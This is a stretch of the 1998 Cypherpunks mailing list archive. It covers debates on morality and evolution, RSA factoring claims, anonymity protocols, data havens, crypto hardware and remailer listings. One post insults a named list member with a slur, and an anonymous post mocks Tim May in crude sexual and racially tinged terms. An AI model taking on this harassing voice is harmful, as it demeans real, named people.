since it assumes our "moral sense" is just our mental accounting
of reciprocal altruism: what we've done for others and what (we think)
others owe us.

> natural selection does however support the idea of altruism. natural
> selection does not require each individual seek survival. various aspects
> of the genetic code that lead to survival of the species are what are
> truly favored. a breed of animals that does nothing but try to kill
> each other off leads to a situation where each individual is maximizing
> the odds of its own DNA propagating, no? but how long would such a 
> species survive? and extra credit, to what "animal" am I actually
> alluding to here?

You are correct: the object is survival of the gene and this can be
at odds with survival of an individual.  This applies to all animals
and even "non" animals; so I have no way of knowing which "animal" you are
alluding to.

> natural selection is relevant among species that have no intelligence
> or intellectual control over their own destiny. it is only relevant to
> humans insofar as we wish to behave like animals.

Our "intelligence" itself evolved, presumably, because it enhanced
genetic fitness in the evolutionary past.  Intelligence exists to
increase, rather than overcome, inclusice genetic fitness.

>>So it is a myth that scientists live to find deep truths or to benefit humanity
>>.  They may do those things, but their real goal is maximizing their own
>>inclusive fitness. 
>
> false, even by your own reasoning, because a scientists DNA does not 
> necessarily lead to more scientist DNA. sons and daughters of scientists
> may be  anything they wish to be in a free country.

All that is required is that the offspring can survive and reproduce. 
Scientists use their jobs as "scientists" to fund survival and reproduction.

> natural selection among animals. and a pretty scary mind that would 
> consider us on that level. I agree there are some vague parallels for
> human development. but humans do not have children in the mindless way
> that animals breed, 

The use of birth control causes the trait, "conscious desire to have children"
(and not use birth control) to be selected.  It was not required before,
so natural selection gave more weight to sex drive and love of offspring.

> nor hopefully do they live their lives according
> only to evolutionary instincts,

The whole premise of evolutionary psychology is that we live
according to evolutionary instincts, it's just that those instincts
(and our behavior) are very complex, and that "consciousness"
and "free will" are illusions.

> but of course letters like yours tend
> to make me wonder, and I'm being deliberately ambiguous here by what
> I mean by that <g>

Of course most people are bothered by the idea that copying genes is
the only thing their life (and all lives) are about.  Life is totally meaningless
if you follow Darwin's logic to its conclusion, and the alternative is
religion and belief in the afterlife.  I personally believe someday we
will see a synthesis of the two, but at the present, which to believe
is a philosophical decision.

----------
From: 	Vladimir Z. Nuri[SMTP:vznuri@netcom.com]
Sent: 	Thursday, January 15, 1998 12:52 PM
To: 	Wayne Radinsky
Cc: 	'Blanc'; 'cypherpunks@cyberpass.net'; 'tcmay@got.net'; 'vznuri@netcom5.netcom.com'; vznuri@netcom11.netcom.com
Subject: 	Re: rant on the morality of confidentiality 



philosophers have struggled with what is moral since the beginning
of civilization. at least they are struggling with the question.
each new civilization and era gives a new answer to the question,
"what is morality", and hopefully each is more evolved than the
last, unless humanity is regressing. "what is morality" is obviously
something that cannot be settled in cyberspace, it hasn't even
been settled by great writers, and there are only mediocre and
borderline insane minds in cyberspace <g>

>The reason morality is impossible to nail down is because it does not exist al 
>all in any absolute sense, at least as far as science is concerned.  If you dec
>lare, for example, that "murder" is "wrong" you are always left with dilemmas, 
>such as whether soldiers who kill during a war are doing something "wrong".

dilemmas do not prove a concept does not exist. there are pretty clear cut
cases, and less well clear cut cases. those that have difficulty with the
concept of morality will tend to focus on the fuzzy cases and conclude
that the whole exercise is a waste of time.

>According to the principle of natural selection, all people, including scientis
>ts, exist purely to maximize their own inclusive genetic fitness.  "Fit" means 
>that an organism is well adapted to it's environment, so "maximizing inclusive 
>genetic fitness" means having the maximum number of offspring which are themsel
>ves fit.

natural selection does however support the idea of altruism. natural
selection does not require each individual seek survival. various aspects
of the genetic code that lead to survival of the species are what are
truly favored. a breed of animals that does nothing but try to kill
each other off leads to a situation where each individual is maximizing
the odds of its own DNA propagating, no? but how long would such a 
species survive? and extra credit, to what "animal" am I actually
alluding to here?

>The underlying reason people benefit by promoting themselves as moral people, i
>n general, is because of the benefit of what evolutionary psychologists call re
>ciprocal altruism.  With reciprocal altruism, both parties benefit if they are 
>in a non-zero-sum situation.  Because most situations are non-zero-sum and the 
>benefits are so great, everyone has a stake in promoting themselves as a good r
>eciprocal altruist, in other words, a good, trustworthy, moral person.  This is
> how natural selection explains the existence of the concept of "morality".

natural selection is relevant among species that have no intelligence
or intellectual control over their own destiny. it is only relevant to
humans insofar as we wish to behave like animals.

>So it is a myth that scientists live to find deep truths or to benefit humanity
>.  They may do those things, but their real goal is maximizing their own inclus
>ive fitness. 

false, even by your own reasoning, because a scientists DNA does not 
necessarily lead to more scientist DNA. sons and daughters of scientists
may be  anything they wish to be in a free country.

>The only way out is to believe in the afterlife, and religion, and that life ha
>s meaning beyond the genes and material world. Doing so doesn't make moral dile
>mmas go away, and you never know, people may just be believing such things for 
>the benefit of genes, after all natural selection has no real concern for "trut
>h".

natural selection among animals. and a pretty scary mind that would 
consider us on that level. I agree there are some vague parallels for
human development. but humans do not have children in the mindless way
that animals breed, nor hopefully do they live their lives according
only to evolutionary instincts, but of course letters like yours tend
to make me wonder, and I'm being deliberately ambiguous here by what
I mean by that <g>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 19 Jan 1998 07:49:52 +0800
To: cypherpunks@cyberpass.net
Subject: proving that one knows how to break RSA
In-Reply-To: <gaTiJe29w165w@bwalk.dm.com>
Message-ID: <199801182343.XAA00268@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Dimitri Vulis <dlv@bwalk.dm.com> writes:
> Bill Payne was with Sandia national lab (where they quite a bit of
> crypto work) Bill claims to have discovered a very fast
> factorization algorithm using shift registers, which he refuses to
> publish. While I haven't seen the algorithm, I believe he may well
> be right.

Bill Payne's claim to having discovered a faster factorization
algorithm than the current state of the art, allows us to invoke the
oft discussed mechanisms for the author to prove this ability without
divulging the algorithm, and then proceed to sell the algorithm to the
highest bidder, whilst minimizing his chances of being killed.

I am sure many here remember various past discussions which were based
on the "what if" question: one has discovered a fast factorization
algorithm and our aims as discoverer are to:

- maximise price for selling algorithm
- minimise chance of being killed by the NSA to silence one
- proving that we posses a fast algorithm 

Minimising our chances of being killed would seem to rely on:

- posting our sale via BlackNet (ie posting anonymously)
- having a disclosure mechanism in place which will be invoked on the
  eventuality of our premature death in an unfortunate `accident'

Bill Payne seems to have already blown the first option in disclosing
his identity.  His dilemma is now that if the highest bidder is the
NSA, they may kill him afterwards to prevent a release of the
algorithm.  This is where a robust disclosure mechanism in event of
premature death would be useful.  I hope Bill has invested in such a
plan.

Maximise price for selling algorithm: hold out for the highest bidder.
Or perhaps sell to multiple parties with NDAs (would NDAs be
sufficient to protect such valuable information?)

Are there any reasons why Bill should be refusing to divulge the
algorithm?  Perhaps he is waiting for a higher bid.  What is the
current highest bid?  What about alternate motives?  Perhaps he is not
interested in money, but rather in proving NSA incompetence?

Or if Bill doesn't in fact have an algorithm, what would be the
motives for falsely claiming that he does?  Is he working for the NSA
to spread FUD?

Lastly proving that Bill has a fast algorithm (or acess to some nice
hardware at NSA).  Several RSA public key challenges are posted and
Bill posts the factorization of the public key.  There are
conveniently pre-published RSA challenges in the form of rsa.com's RSA
factoring challenge with multiples of two primes ranging in sizes
going up in steps of 10 in decimal digits.

It would I think provide best assurance if challenges of both sorts
were broken, in that the RSA challenges have been available for some
time, and Bill could have been working on RSA 140 for the last 3 years
or whatever.

So, Bill what size challenge in bits would you like to break first?
I'll post one of your desired bit size.

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 19 Jan 1998 13:29:05 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Interlock Protocol
Message-ID: <199801190555.XAA20602@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

The Interlock Protocal (Applied Crypto 2nd. ed., pp. 49) is just exactly
what I have been looking for to address the MITM issues in regards the data
haven model I have been working on. I had completely forgotten about this
technique. I should read AC more often...;)

Thanks again for the pointer!


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Crispin <kent@songbird.com>
Date: Mon, 19 Jan 1998 16:29:34 +0800
To: Cypherpunks Distributed Remailer <cypherpunks@ssz.com>
Subject: Re: (eternity) Eternity as a secure filesystem/backup medium (fwd)
In-Reply-To: <199801190625.AAA20771@einstein.ssz.com>
Message-ID: <19980119001935.11065@songbird.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, Jan 19, 1998 at 12:25:02AM -0600, Jim Choate wrote:
> Forwarded message:
> 
> > Date: Sun, 18 Jan 1998 21:31:38 -0800
> > From: Kent Crispin <kent@songbird.com>
> > Subject: Re: (eternity) Eternity as a secure filesystem/backup medium (fwd)
> 
> > You must find the advertising business completely mystifying, then.
> 
> Not at all. I even manage to use it well enough to make money selling my
> own services now and again...
> 
> > You pay to have your data disseminated in a form that you can be later
> > paid -- for example, leave the juciest part of the data in encrypted
> > form, along with a public key through which payment options can be
> > negotiated. 
> 
> Exactly, which means we are left with two results. Either the source forgoes
> the d-h completely, since they could dissiminate their data through a normal
> anon remailer and usenet (for example) completely eliminating the whole
> point of the d-h and the consequential payments - this reduces their
> overhead considerably. Or they share the income through the d-h operator.
> Now if the source has two halves of a clue to rub together their share will
> include whatever money they paid the d-h operator in the first place - thus
> eliminating the need for the source to have paid in the first place. Either
> way the source ends up with the net effect they don't pay the d-h operator
> for their services - the end user does. In only one case is there a economic
> reason for the d-h to exist. Now if the goal of a d-h operator is to make
> some income which model would you choose? From the source's perspective the
> d-h model makes sense because it places two (not one) layer of anonymity
> between them and Mallet. As a source, which model would you choose?
> 
> Either way you look at it, the end result is the end user pays the bills.
> 
> > Why on earth do you try to be an ISP, then?
> 
> Why on earth are you assuming that is what I do? While I have sold dedicated
> and intermittent dial-ups they in general have not been to the general
> public and my customer base is not one that comes from general advertising.
> At no point has it ever been a significant portion of my income in any case.
> As a matter of fact I haven't advertised in any public forums. Don't know
> where you get your data about me from but you really should go to the horses
> mouth instead of some jackass. Your data would be much more accurate.

Actually, the only data I have is your comments on CP over the past
year or so. 

-- 
Kent Crispin, PAB Chair			"No reason to get excited",
kent@songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 19 Jan 1998 13:43:19 +0800
To: cypherpunks@toad.com
Subject: Re: Unofficial transcript of Bernstein hearing published
In-Reply-To: <199801190451.UAA07568@toad.com>
Message-ID: <qqgJJe2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



John Gilmore <gnu@toad.com> writes:
<shit deleted>
> 	John Gilmore
> 	Electronic Frontier Foundation

Stay the fuck off the unmoderated cypherpunks mailing list, cocksucker.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 19 Jan 1998 13:55:02 +0800
To: cypherpunks@toad.com
Subject: Re: proving that one knows how to break RSA
In-Reply-To: <199801190434.UAA20448@netcom16.netcom.com>
Message-ID: <HsgJJe3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Vlad the E-mailer <vznuri@netcom.com> writes:
> I think this ought to be nipped in the bud right now if not true.

I think you ought to be killfiled.

<PLONK>

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 19 Jan 1998 13:55:19 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: (eternity) Eternity as a secure filesystem/backup medium (fwd)
Message-ID: <199801190625.AAA20771@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 18 Jan 1998 21:31:38 -0800
> From: Kent Crispin <kent@songbird.com>
> Subject: Re: (eternity) Eternity as a secure filesystem/backup medium (fwd)

> You must find the advertising business completely mystifying, then.

Not at all. I even manage to use it well enough to make money selling my
own services now and again...

> You pay to have your data disseminated in a form that you can be later
> paid -- for example, leave the juciest part of the data in encrypted
> form, along with a public key through which payment options can be
> negotiated. 

Exactly, which means we are left with two results. Either the source forgoes
the d-h completely, since they could dissiminate their data through a normal
anon remailer and usenet (for example) completely eliminating the whole
point of the d-h and the consequential payments - this reduces their
overhead considerably. Or they share the income through the d-h operator.
Now if the source has two halves of a clue to rub together their share will
include whatever money they paid the d-h operator in the first place - thus
eliminating the need for the source to have paid in the first place. Either
way the source ends up with the net effect they don't pay the d-h operator
for their services - the end user does. In only one case is there a economic
reason for the d-h to exist. Now if the goal of a d-h operator is to make
some income which model would you choose? From the source's perspective the
d-h model makes sense because it places two (not one) layer of anonymity
between them and Mallet. As a source, which model would you choose?

Either way you look at it, the end result is the end user pays the bills.

> Why on earth do you try to be an ISP, then?

Why on earth are you assuming that is what I do? While I have sold dedicated
and intermittent dial-ups they in general have not been to the general
public and my customer base is not one that comes from general advertising.
At no point has it ever been a significant portion of my income in any case.
As a matter of fact I haven't advertised in any public forums. Don't know
where you get your data about me from but you really should go to the horses
mouth instead of some jackass. Your data would be much more accurate.



    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Mon, 19 Jan 1998 09:39:19 +0800
To: cypherpunks@toad.com
Subject: Onion routing
Message-ID: <19980119013252.18949@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain



To protect against timing analysis, Onion routing uses encrypted and
padded links, and the connection between the user and his local onion
router is assumed to be secure.

Obviously, padding offers protection against external adversaries
only.  The onion routers themselves know when an anonymous connection
is opened, how much data is transferred, and when it is closed.  So in
contrast to the mix net (where it is sufficient to use one honest mix
in a chain), honest onion routers that are used between two
cooperating onion routers do not offer additional protection.

Onion routers have a fixed number of neighbours.  If the first onion
router does not have any honest neighbours, there is no anonymity.
Generally, the maximal connected component of honest onion routers
forms the anonymity set.

Does that mean that every onion router needs to maintain many
encrypted links, or is there a more efficient solution?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 19 Jan 1998 10:43:38 +0800
To: jya@pipeline.com
Subject: Re: let's do it: NYT ad with hash of fingerprints (fwd)
In-Reply-To: <1.5.4.32.19980119010440.0072a198@pop.pipeline.com>
Message-ID: <199801190206.CAA00340@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




John Young <jya@pipeline.com> writes:
> Jim Choate wrote:
> >This doesn't provide the same sort of protection the original full page ad
> >is supposed to provide. That full page ad will be accessible as a reference
> >a hundred years from now in just about every library in the country. The
> >link to a webpage won't be.

If the keys aren't easily obtainable, the hash of them is no use
either, so we are already relying on the availability of other text.

If the information was valued people would keep copies and mirrors.
They could for example post it to the eternity service if/when a
viable service is realised.

I viewed it more as a way to strengthen the web of trust rather than
an expensive long term paper based web server.

I think it would be ok for our purposes to omit a URL, firstly because
URLs don't always last that long, and secondly because we want to
reference the publication, but aren't really bothered about having the
application reference us.

> Printed ads are sometimes not archived as widely as news articles, due
> to the cost of reproduction, distribution and storage.
> 
> The same is true, though, of personals and other types of throwaways.

Oh.  Not so good.

> One possibility is to buy an ad on the NYT Front Page which is often
> sent as an image around the world separately from the full paper,
> and on which one can buy a tiny ad for about $800 for two lines of
> text 32 characters long (ID must be included). That's the rate for a
> one-timer.

Well theoretically we could go for 32 characters for a MD5 hash output
only.  SHA1 would be better at 40 characters.  (We could brute force a
hash length reduction and maybe claw back 4 characters at an expected
cost of 2^32 hash runs).

The printed hash could be the output of the hash function run on a
text document including the keys which we mirror in various places.
We can include any text we want to authenticate in this document,
keys, time stamp hash tree outputs, URLs, mailing list addresses,
whatever.

> Adam, could you reduce the requisite gob to fit 64 characters? Each extra
> line runs about $300.

We are at 40 characters for an SHA1 output, or maybe only 32
characters with a bit of brute-forcing.  

What do you mean that you must include ID?  Someone must give an email
address, or phone number?  Should be ok to fit one of those in the
remaining 24 - 32 chars.  Or a URL.  "jya.com" easy.

> However, bear in mind that a news article is cheaper and will be
> archived for eternity (until Asteroid Endall); cheaper, that is, if
> you can pukedrunk a reviler.

Doesn't sound news-worthy itself.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mix <mixmaster@remail.obscura.com>
Date: Mon, 19 Jan 1998 18:54:31 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199801191041.CAA21251@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May sits at his terminal 
dressed in five-inch stiletto heels, 
fishnet stockings, a gold-lame 
mini-skirt, a purple halter with girdle 
underneath to keep in his flabby gut, a 
Fredericks of Hollywood padded bra also 
underneath the halter, a cheap Naomi Sims 
pink afro wig, waiting to yank his crank 
whenever a black man responds to one of 
his inane rants.

           \
          o/\_ Timothy C. May
         <\__,\
          '\,  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Mon, 19 Jan 1998 20:33:52 +0800
To: Ryan Lackey <rdl@mit.edu>
Subject: Re: RSA hardware
In-Reply-To: <199801191102.GAA01363@the-great-machine.mit.edu>
Message-ID: <199801191243.HAA28745@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Mon, 19 Jan 1998 19:11:30 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: RSA hardware
In-Reply-To: <3.0.2.32.19980119015700.0073e558@netcom10.netcom.com>
Message-ID: <199801191102.GAA01363@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


Lucky Green:
> The more I think about it, the less sense it makes to me to use a dedicated
> hardware accelerator. I have seen $3,000 hardware accelerators that are
> outperformed by a PP200. The nCipher device is excellent. 100 1024 bit RSA
> signing a minute for $5,000. How much would be a nice multi-processor Alpha
> that does about the same number of signings? Or just a stack 10 of Pentiums?
> 
> Before buying an accelerator, make sure to do the math. Eric Young posted
> timings for various common CPU's a while back.

Keep in mind that there are metrics other than just keys per second for
comparison.  Often, hardware devices are certified RED/BLACK isolation
devices, TEMPEST certified, tamper-resistant, etc.  They are also usually
easier to maintain than software systems on GP hardware.

Also, the major consumers of such devices, the government/military, spend
a *lot* more on hardware/software/user maintenance than any cypherpunk.  Their
computers are usually TEMPEST certified, etc., so their curve is a lot
higher up.

Assuming efficient markets, the reason so few of these devices are sold
outside the military is that they're overpriced except for those in
the same situation as the military. though :)

I've been thinking of buying a wicked-fast FPGA prototyping board and
making my own coprocessor.  There are some really nice gate arrays, and
David Honig has some fairly wonderful plans for how to use them for
things like Blowfish, etc.  I've mainly concentrated on high-speed
symmetric ciphers, but they'd be applicable to RSA/DH, I believe.  For
one blowfish implementation, the limiting factor (assuming key setup
can be done efficiently) is the PCI bus, I think.
- -- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBNMMyzKwefxtEUY69AQGruwgAgsJTym5TsaFLVGgBXQQpUYwd8Ar2lquU
SFM9F1LYLTQjcBIlzh9h3cQdfE2sOkpjENmVGqUvPhyZLwRAC5eWfHL8H/y0giIW
9Y+1xYY1pY3t/O7w5WgYDwye1fzbL5KDz4XEYKX830LWjShfAZhQxahzLbZd+qnd
Z6KpjSnylTb9YSp+i5rafgk/i8GnjqFdv5925reexzFBhy/FQi3xwweJWxeRWa+o
tNX4G/D7W2r1Lq4Z6Yxbk3dTDddif26UTE12M8EENhhlr/6VCO0zGI59VePUC55w
ZeqgUDGviqe/il1EUMIKUfNdSYBJ0Ur5T4TL2lVYDPrZ6q4KjnHPjA==
=9ejF
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "wayne clerke" <wclerke@emirates.net.ae>
Date: Mon, 19 Jan 1998 10:29:08 +0800
To: "Lance Cottrell" <cypherpunks@cyberpass.net>
Subject: RE: FCPUNX:Anonymous IRC (was 'Cypherpunks IRC Christmas Eve Party')
In-Reply-To: <v0310280ab0d33f12c165@[206.170.115.5]>
Message-ID: <199801191015.GAA19793@ns2.emirates.net.ae>
MIME-Version: 1.0
Content-Type: text/plain



> -----Original Message-----
> From: Lance Cottrell [mailto:loki@infonex.com]
> Sent: Saturday, January 03, 1998 5:08 AM
> To: wayne clerke; cypherpunks@cyberpass.net
> Subject: Re: FCPUNX:Anonymous IRC (was 'Cypherpunks IRC Christmas Eve
> Party')

[...]

> >What's the reason behind the policy direction against the use of personal
web
> >proxies running in a (paid for) shell account?
> >Seems like less risk than you already accept anyway. Something I've
missed?
> >
>
> System load is the issue in this case. If a proxy becomes publicly known
> the load it imposes on the system could quickly become gigantic. In
> addition we found that people were setting up proxies on any old port,
> sometimes causing all kinds of conflicts.
>
> Our accounts are priced assuming light personal usage. Running servers on
> our systems is negotiable.

It seems this was just stated on the list for advertizing purposes.

It's not so negotiable that private emails are responded to.

>
> 	-Lance
>
> ----------------------------------------------------------
> Lance Cottrell   loki@infonex.com
> PGP 2.6 key available by finger or server.
> http://www.infonex.com/~loki/

Mail: <a href= mailto:wclerke@emirates.net.ae >Wayne Clerke</a>
PGP key id: AEB2546D  F/P: D663D11EDA19D74F5032DC7EE001B702
PGP key id: 57AA1C10  F/P: 9926BF8918B7EB3623A7 AFA46572C5B857AA1C10
PGP mail welcome.			Voice: +971 506 43 4853
If you're not living on the edge, you're taking up too much space.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Mon, 19 Jan 1998 20:52:03 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Barry Smith (FBI) to speak on encryption policy
Message-ID: <199801191304.IAA28944@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



Anyone going to this?

-------------------------------------------------------------------------
The following message is forwarded to you by "William H. Geiger III"
<whgiii@invweb.net> (listed as the From user of this message).  The
original sender (see the header, below) was "Dr. Alan Sherman"
<sherman@gl.umbc.edu> and has been set as the "Reply-To" field of this
message.
-------------------------------------------------------------------------
>From: "Dr. Alan Sherman" <sherman@gl.umbc.edu>
>Newsgroups: sci.crypt
>Subject: Barry Smith (FBI) to speak on encryption policy
>Date: 19 Jan 1998 01:54:28 -0000
>Organization: University of Maryland, Baltimore County Campus
>Lines: 55
>Message-ID: <69ubok$lkn@news.umbc.edu>
>NNTP-Posting-Host: news.umbc.edu
>NNTP-Posting-User: sherman
>Path: edison.dotstar.net!pull-feed.internetmci.com!news-out.internetmci.com!newsfeed.internetmci.com!204.59.152.222!news-peer.gip.net!news.gsl.net!gip.net!feeder.qis.net!news.umbc.edu!not-for-mail

   The UMBC Security Technology Research Group presents

     A Law-Enforcement Perspective on Encryption Policy

			Barry Smith
	       Supervisory Special Agent, FBI

	    moderated by journalist Peter Wayner

		      3:30pm - 5:00pm
		   Friday, March 6, 1998
	Lecture Hall V (LOCATION SUBJECT TO CHANGE)
	  University of Maryland, Baltimore County
    http://www.cs.umbc.edu/events/spring98/crypto.shtml

The second lecture and discussion in a two-part forum on
encryption policy.  Journalist Peter Wayner will introduce
and moderate the event, which is free and open to the
public.  In Part I, freedom activist John Gilmore and Fritz
Fielding (Ex-Associate General Councel, NSA) gave their
divergent views, focusing on the Burnstein case.

Barry Smith will articulate the needs of law enforcement to
conduct lawful wiretaps; he will advocate the use of
key-recovery techniques to achieve this end as a way that
provides adequate privacy to law-abiding citizens.

Schedule: The event will begin with a brief (10 minute)
introduction by Peter Wayner.  Following Barry Smith's talk,
which will last approximately 45 minutes, there will be an
opportunity to ask questions for approximately 20-30
minutes.

Questions: Attendees are encouraged to ask questions in
advance by sending email to sherman@cs.umbc.edu

Directions: Take Exit #47B off interstate I-95 and follow
signs to UMBC.  LH V is on the 100-level of the Engineering
Computer Science (ECS) Building, directly behind the
University Center.  There is a visitor's parking lot near
the I-95 entrance to UMBC.

Host: Dr. Alan T. Sherman
      Associate Professor, Computer Science
      sherman@cs.umbc.edu
      http://www.umbc.edu
      (410) 455-2666

     This event is held in cooperation with the UMBC
	       Intellectual Sports Council
		       Honors College
	       Phi Beta Kappa honors society
                   CMSC Council of Majors
		   IFSM Council of Majors


-----------------------------------------------------
 -- End of forwarded message
-----------------------------------------------------
-- 
---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
---------------------------------------------------------------
 
Tag-O-Matic: One man's Windows are another man's walls.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 19 Jan 1998 23:05:53 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199801191450.GAA23358@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash middle latent cut ek";
$remailer{"winsock"} = "<winsock@rigel.cyberpass.net> cpunk pgp pgponly hash cut ksub reord ?";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp pgponly hash latent cut ek";
$remailer{'weasel'} = '<config@weasel.owl.de> newnym pgp';
$remailer{"reno"} = "<middleman@cyberpass.net> cpunk mix pgp hash middle latent cut ek reord ?";
$remailer{"cracker"} = "<remailer@anon.efga.org> cpunk mix remix pgp hash ksub esub latent cut ek reord post";
$remailer{'redneck'} = '<config@anon.efga.org> newnym pgp';
$remailer{"bureau42"} = "<remailer@bureau42.ml.org> cpunk mix pgp ksub hash latent cut ek";
$remailer{"neva"} = "<remailer@neva.org> cpunk pgp pgponly hash cut ksub ?";
$remailer{"lcs"} = "<mix@anon.lcs.mit.edu> mix";
$remailer{"medusa"} = "<medusa@weasel.owl.de> mix middle"
$remailer{"McCain"} = "<mccain@notatla.demon.co.uk> mix middle";
$remailer{"valdeez"} = "<valdeez@juno.com> cpunk pgp pgponly hash ek";
$remailer{"arrid"} = "<arrid@juno.com> cpunk pgp pgponly hash ek";
$remailer{"hera"} = "<goddesshera@juno.com> cpunk pgp pgponly hash ek";
$remailer{"htuttle"} = "<h_tuttle@rigel.cyberpass.net> cpunk pgp hash latent cut post ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.
remailer@crynwr.com is _not_ a remailer.

There is no remailer at relay.com.

Groups of remailers sharing a machine or operator:
(cyber mix reno winsock)
(weasel squirrel medusa)
(cracker redneck)
(nym lcs)
(valdeez arrid hera)

This remailer list is somewhat phooey. Go check out
http://www.publius.net/rlist.html for a good one.

Last update: Thu 23 Oct 97 15:48:06 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
